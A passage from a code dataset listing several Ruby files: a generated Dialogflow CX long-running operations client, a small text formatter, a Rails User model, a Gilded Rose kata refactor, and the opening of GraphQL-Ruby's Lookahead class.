hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
61d2ba03b2b3d13fbbc210da97c24b0913afac89 | 40,510 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "gapic/operation"
require "google/longrunning/operations_pb"
module Google
module Cloud
module Dialogflow
module CX
module V3
module TestCases
# Service that implements Longrunning Operations API.
class Operations
# @private
attr_reader :operations_stub
##
# Configuration for the TestCases Operations API.
#
# @yield [config] Configure the Operations client.
# @yieldparam config [Operations::Configuration]
#
# @return [Operations::Configuration]
#
def self.configure
  # Lazily create the class-level configuration on first access and reuse it
  # for every subsequent call.
  @configure ||= Operations::Configuration.new
  if block_given?
    yield @configure
  end
  @configure
end
##
# Configure the TestCases Operations instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Operations.configure}.
#
# @yield [config] Configure the Operations client.
# @yieldparam config [Operations::Configuration]
#
# @return [Operations::Configuration]
#
def configure
  # Hand the instance configuration to the caller's block (when given) and
  # return it either way.
  @config.tap { |cfg| yield cfg if block_given? }
end
##
# Create a new Operations client object.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Operations::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/longrunning/operations_services_pb"
# Create the configuration object
@config = Configuration.new Operations.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
credentials ||= Credentials.default scope: @config.scope
# A String is treated as a path to a key file and a Hash as key material;
# both are coerced into a full credentials object.
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
# Explicit quota project wins; otherwise fall back to the one carried by
# the credentials, when they expose it.
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
# Build the low-level gRPC stub used by every RPC method below.
@operations_stub = ::Gapic::ServiceStub.new(
::Google::Longrunning::Operations::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
# Service calls
##
# Lists operations that match the specified filter in the request. If the
# server doesn't support this method, it returns `UNIMPLEMENTED`.
#
# NOTE: the `name` binding allows API services to override the binding
# to use different resource name schemes, such as `users/*/operations`. To
# override the binding, API services can add a binding such as
# `"/v1/{name=users/*}/operations"` to their service configuration.
# For backwards compatibility, the default name includes the operations
# collection id, however overriding users must ensure the name binding
# is the parent resource, without the operations collection id.
#
# @overload list_operations(request, options = nil)
# Pass arguments to `list_operations` via a request object, either of type
# {::Google::Longrunning::ListOperationsRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::ListOperationsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_operations(name: nil, filter: nil, page_size: nil, page_token: nil)
# Pass arguments to `list_operations` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation's parent resource.
# @param filter [::String]
# The standard list filter.
# @param page_size [::Integer]
# The standard list page size.
# @param page_token [::String]
# The standard list page token.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Gapic::Operation>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Gapic::Operation>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::ListOperationsRequest.new
#
# # Call the list_operations method.
# result = client.list_operations request
#
# # The returned object is of type Gapic::PagedEnumerable. You can
# # iterate over all elements by calling #each, and the enumerable
# # will lazily make API calls to fetch subsequent pages. Other
# # methods are also available for managing paging directly.
# result.each do |response|
# # Each element is of type ::Google::Longrunning::Operation.
# p response
# end
#
def list_operations request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::ListOperationsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_operations.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
# Build the implicit routing header from the request's resource name.
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
# Per-RPC defaults take precedence; client-wide defaults fill the gaps.
options.apply_defaults timeout: @config.rpcs.list_operations.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_operations.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :list_operations, request, options: options do |response, operation|
# Each raw longrunning operation in the page is wrapped in a Gapic::Operation.
# NOTE(review): @operations_client is never assigned in this class, so the
# wrapper receives a nil client — confirm against the generator's output.
wrap_lro_operation = ->(op_response) { ::Gapic::Operation.new op_response, @operations_client }
response = ::Gapic::PagedEnumerable.new @operations_stub, :list_operations, request, response, operation, options, format_resource: wrap_lro_operation
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
# Map gRPC status failures onto the Google Cloud error hierarchy.
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets the latest state of a long-running operation. Clients can use this
# method to poll the operation result at intervals as recommended by the API
# service.
#
# @overload get_operation(request, options = nil)
# Pass arguments to `get_operation` via a request object, either of type
# {::Google::Longrunning::GetOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::GetOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_operation(name: nil)
# Pass arguments to `get_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::GetOperationRequest.new
#
# # Call the get_operation method.
# result = client.get_operation request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def get_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::GetOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
# Implicit routing header derived from the operation resource name.
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
# Per-RPC defaults first, then client-wide defaults as a fallback.
options.apply_defaults timeout: @config.rpcs.get_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :get_operation, request, options: options do |response, operation|
# NOTE(review): @operations_client is never assigned in this class — confirm
# the Gapic::Operation wrapper is expected to receive a nil client here.
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
# Map gRPC status failures onto the Google Cloud error hierarchy.
raise ::Google::Cloud::Error.from_error(e)
end
##
# Deletes a long-running operation. This method indicates that the client is
# no longer interested in the operation result. It does not cancel the
# operation. If the server doesn't support this method, it returns
# `google.rpc.Code.UNIMPLEMENTED`.
#
# @overload delete_operation(request, options = nil)
# Pass arguments to `delete_operation` via a request object, either of type
# {::Google::Longrunning::DeleteOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::DeleteOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_operation(name: nil)
# Pass arguments to `delete_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource to be deleted.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::DeleteOperationRequest.new
#
# # Call the delete_operation method.
# result = client.delete_operation request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def delete_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::DeleteOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.delete_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
# Implicit routing header derived from the operation resource name.
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
# Per-RPC defaults first, then client-wide defaults as a fallback.
options.apply_defaults timeout: @config.rpcs.delete_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.delete_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
# The raw Google::Protobuf::Empty response is returned unwrapped.
@operations_stub.call_rpc :delete_operation, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
# Map gRPC status failures onto the Google Cloud error hierarchy.
raise ::Google::Cloud::Error.from_error(e)
end
##
# Starts asynchronous cancellation on a long-running operation. The server
# makes a best effort to cancel the operation, but success is not
# guaranteed. If the server doesn't support this method, it returns
# `google.rpc.Code.UNIMPLEMENTED`. Clients can use
# Operations.GetOperation or
# other methods to check whether the cancellation succeeded or whether the
# operation completed despite cancellation. On successful cancellation,
# the operation is not deleted; instead, it becomes an operation with
# an {::Google::Longrunning::Operation#error Operation.error} value with a {::Google::Rpc::Status#code google.rpc.Status.code} of 1,
# corresponding to `Code.CANCELLED`.
#
# @overload cancel_operation(request, options = nil)
# Pass arguments to `cancel_operation` via a request object, either of type
# {::Google::Longrunning::CancelOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::CancelOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload cancel_operation(name: nil)
# Pass arguments to `cancel_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource to be cancelled.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::CancelOperationRequest.new
#
# # Call the cancel_operation method.
# result = client.cancel_operation request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
def cancel_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::CancelOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.cancel_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
# Implicit routing header derived from the operation resource name.
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
# Per-RPC defaults first, then client-wide defaults as a fallback.
options.apply_defaults timeout: @config.rpcs.cancel_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.cancel_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
# The raw Google::Protobuf::Empty response is returned unwrapped.
@operations_stub.call_rpc :cancel_operation, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
# Map gRPC status failures onto the Google Cloud error hierarchy.
raise ::Google::Cloud::Error.from_error(e)
end
##
# Waits until the specified long-running operation is done or reaches at most
# a specified timeout, returning the latest state. If the operation is
# already done, the latest state is immediately returned. If the timeout
# specified is greater than the default HTTP/RPC timeout, the HTTP/RPC
# timeout is used. If the server does not support this method, it returns
# `google.rpc.Code.UNIMPLEMENTED`.
# Note that this method is on a best-effort basis. It may return the latest
# state before the specified timeout (including immediately), meaning even an
# immediate response is no guarantee that the operation is done.
#
# @overload wait_operation(request, options = nil)
# Pass arguments to `wait_operation` via a request object, either of type
# {::Google::Longrunning::WaitOperationRequest} or an equivalent Hash.
#
# @param request [::Google::Longrunning::WaitOperationRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload wait_operation(name: nil, timeout: nil)
# Pass arguments to `wait_operation` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# The name of the operation resource to wait on.
# @param timeout [::Google::Protobuf::Duration, ::Hash]
# The maximum duration to wait before timing out. If left blank, the wait
# will be at most the time permitted by the underlying HTTP/RPC protocol.
# If RPC context deadline is also specified, the shorter one will be used.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/longrunning"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Longrunning::Operations::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Longrunning::WaitOperationRequest.new
#
# # Call the wait_operation method.
# result = client.wait_operation request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
def wait_operation request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Longrunning::WaitOperationRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.wait_operation.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Dialogflow::CX::V3::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
# Unlike the other RPCs in this class, no x-goog-request-params routing
# header is built here.
# Per-RPC defaults first, then client-wide defaults as a fallback.
options.apply_defaults timeout: @config.rpcs.wait_operation.timeout,
metadata: metadata,
retry_policy: @config.rpcs.wait_operation.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@operations_stub.call_rpc :wait_operation, request, options: options do |response, operation|
# NOTE(review): @operations_client is never assigned in this class — confirm
# the Gapic::Operation wrapper is expected to receive a nil client here.
response = ::Gapic::Operation.new response, @operations_client, options: options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
# Map gRPC status failures onto the Google Cloud error hierarchy.
raise ::Google::Cloud::Error.from_error(e)
end
##
# Configuration class for the Operations API.
#
# This class represents the configuration for Operations,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Longrunning::Operations::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # list_operations to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Longrunning::Operations::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.list_operations.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Longrunning::Operations::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.list_operations.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"dialogflow.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentials object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "dialogflow.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
# Builds a configuration, optionally chained to a parent configuration whose
# values serve as fallbacks. The assignment is skipped entirely (rather than
# set to nil) when no parent is given, so that the `defined?(@parent_config)`
# check in #rpcs behaves correctly.
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
# Memoize the per-RPC configuration container on first access.
@rpcs ||= begin
parent_rpcs = nil
# Inherit per-RPC settings from the parent configuration when one was given.
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the Operations API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy` (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
class Rpcs
##
# RPC-specific configuration for `list_operations`
# @return [::Gapic::Config::Method]
#
attr_reader :list_operations
##
# RPC-specific configuration for `get_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :get_operation
##
# RPC-specific configuration for `delete_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :delete_operation
##
# RPC-specific configuration for `cancel_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :cancel_operation
##
# RPC-specific configuration for `wait_operation`
# @return [::Gapic::Config::Method]
#
attr_reader :wait_operation
# @private
# Builds one Gapic::Config::Method entry per RPC, each inheriting from the
# matching entry on the parent Rpcs object when one is available.
def initialize parent_rpcs = nil
list_operations_config = parent_rpcs.list_operations if parent_rpcs.respond_to? :list_operations
@list_operations = ::Gapic::Config::Method.new list_operations_config
get_operation_config = parent_rpcs.get_operation if parent_rpcs.respond_to? :get_operation
@get_operation = ::Gapic::Config::Method.new get_operation_config
delete_operation_config = parent_rpcs.delete_operation if parent_rpcs.respond_to? :delete_operation
@delete_operation = ::Gapic::Config::Method.new delete_operation_config
cancel_operation_config = parent_rpcs.cancel_operation if parent_rpcs.respond_to? :cancel_operation
@cancel_operation = ::Gapic::Config::Method.new cancel_operation_config
wait_operation_config = parent_rpcs.wait_operation if parent_rpcs.respond_to? :wait_operation
@wait_operation = ::Gapic::Config::Method.new wait_operation_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
end
| 52.61039 | 168 | 0.547741 |
1ad8aff0cd231d842de20572af7227ea52a85961 | 446 | module Lumos
module Formatters
# Formatter that draws its horizontal border below the content.
class Bottom < Lumos::Formatters::Base
  def initialize(options = {})
    super
    # Padding is always a non-negative integer.
    @padding = options.fetch(:padding, 0).to_i.abs
  end

  # Renders the content lines first, followed by the padding rows and the
  # closing horizontal rule.
  def result
    body = iterate_chopped_lines { |line| "#{content_paragraph(line)}\n" }
    [body, horizontal_padding, horizontal_line].join
  end

  private

  # A bottom border leaves each content line unchanged.
  def content_paragraph(line)
    line
  end
end
end
end
| 19.391304 | 76 | 0.578475 |
26e92ccaa65433a6795b4f7e045593b41173fd1f | 253 | class User < ApplicationRecord
# Integer-backed role flag: 0 = regular user, 1 = admin.
enum role: { user: 0, admin: 1 }
# Destroying a user removes their quizzes as well.
has_many :quizzes, dependent: :destroy
# No :dependent option here, so user_answers are left in place on destroy.
has_many :user_answers
# bcrypt-backed password handling (expects a password_digest column).
has_secure_password
validates :firstname, presence: true
# Email doubles as the unique login identifier.
validates :email, presence: true, uniqueness: true
end
| 21.083333 | 52 | 0.743083 |
abb43d8abafc0f5464dd83a272c886edfbdd3500 | 2,017 | # frozen_string_literal: true
# Gilded Rose inventory updater.
# NOTE(review): this looks like a partially refactored version of the classic
# kata; several branches below have suspicious results (see inline notes) and
# should be compared against the intended specification before further changes.
class GildedRose
def initialize(items)
@items = items
end
# Advances every tracked item by one "day".
def update_quality
@items.each do |item|
if different_from_brie_and_backstage?(item.name)
# NOTE(review): first_validation returns nil when quality is not positive
# or when the item is Sulfuras, so this can assign quality = nil — likely a bug.
item.quality = first_validation(item)
elsif quality_less_than_fifty?(item.quality)
second_validation(item)
elsif different_from_sulfuras?(item.name)
# NOTE(review): sell_in is only ever decremented on this branch, which the
# earlier branches shadow for most items — confirm this is intended.
item.sell_in = subtract(item.sell_in)
elsif item.sell_in.negative?
third_validation(item)
end
end
end
# True for every item except Sulfuras.
def different_from_sulfuras?(name)
name != 'Sulfuras, Hand of Ragnaros'
end
# True for every item except Aged Brie.
def diffent_from_brie?(name)
name != 'Aged Brie'
end
# True for items that are neither Aged Brie nor backstage passes.
def different_from_brie_and_backstage?(name)
diffent_from_brie?(name) &&
name != 'Backstage passes to a TAFKAL80ETC concert'
end
# Despite the name, this only checks for backstage passes.
def equal_to_brie_and_backstage(name)
name == 'Backstage passes to a TAFKAL80ETC concert'
end
def subtract(item)
item - 1
end
def sum(quality)
quality + 1
end
def quality_less_than_fifty?(quality)
quality < 50
end
# Returns quality - 1, or nil when quality is not positive / item is Sulfuras.
def first_validation(item)
return unless item.quality.positive? && different_from_sulfuras?(item.name)
subtract(item.quality)
end
# NOTE(review): the second assignment has no else branch, so quality becomes
# nil for backstage passes with sell_in >= 11 and other items with
# sell_in >= 6 — confirm against the intended behavior.
def second_validation(item)
item.quality = sum(item.quality)
item.quality = if equal_to_brie_and_backstage(item.name) && item.sell_in < 11
sum(item.quality)
elsif item.sell_in < 6
sum(item.quality)
end
end
# NOTE(review): the final branch computes sum(item.quality) but never assigns
# it back to the item — likely a dropped assignment.
def third_validation(item)
if different_from_brie_and_backstage?(item.name)
first_validation(item)
elsif diffent_from_brie?(item.name)
item.quality = item.quality - item.quality
elsif quality_less_than_fifty?(item.quality)
sum(item.quality)
end
end
end
# Plain value holder for a single inventory item.
class Item
  attr_accessor :name, :sell_in, :quality

  def initialize(name, sell_in, quality)
    @name = name
    @sell_in = sell_in
    @quality = quality
  end

  # Human-readable "name, sell_in, quality" rendering.
  def to_s
    format('%s, %s, %s', @name, @sell_in, @quality)
  end
end
| 22.411111 | 81 | 0.667824 |
39a36753f534510c77399c2fe8e9f8bc4a523c9d | 15,901 | # frozen_string_literal: true
module GraphQL
module Execution
# Lookahead creates a uniform interface to inspect the forthcoming selections.
#
# It assumes that the AST it's working with is valid. (So, it's safe to use
# during execution, but if you're using it directly, be sure to validate first.)
#
# A field may get access to its lookahead by adding `extras: [:lookahead]`
# to its configuration.
#
# @example looking ahead in a field
# field :articles, [Types::Article], null: false,
# extras: [:lookahead]
#
# # For example, imagine a faster database call
# # may be issued when only some fields are requested.
# #
# # Imagine that _full_ fetch must be made to satisfy `fullContent`,
# # we can look ahead to see if we need that field. If we do,
# # we make the expensive database call instead of the cheap one.
# def articles(lookahead:)
# if lookahead.selects?(:full_content)
# fetch_full_articles(object)
# else
# fetch_preview_articles(object)
# end
# end
class Lookahead
# @param query [GraphQL::Query]
# @param ast_nodes [Array<GraphQL::Language::Nodes::Field>, Array<GraphQL::Language::Nodes::OperationDefinition>]
